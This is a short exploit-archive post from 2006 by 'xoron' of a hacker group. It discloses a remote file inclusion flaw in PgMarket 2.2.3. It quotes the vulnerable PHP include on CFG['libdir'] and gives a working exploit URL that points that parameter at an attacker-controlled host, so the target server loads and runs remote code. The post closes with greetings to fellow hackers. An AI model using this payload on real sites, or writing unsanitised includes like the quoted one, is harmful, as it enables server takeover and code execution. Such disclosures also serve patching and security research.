id: 669
date: 08/08/2006
title: PgMarket <= 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerability
author: xoron
cves: 

===================================================================
PgMarket <= 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerability
===================================================================



####################################################
#
#
#           C Y B E R - W A R R i O R   T I M
#
#
####################################################

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

####################################################

Author: xoron

####################################################

Class : Remote


####################################################

Code:

include ($CFG["libdir"] . "stdlib.inc.php");

####################################################

Exploit:
http://www.site.com/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?

####################################################

Greetz: Preddy, Iron, x-master, DJR, R3D4C!D and all my friends

####################################################


#  0day.today [2023-03-27]  #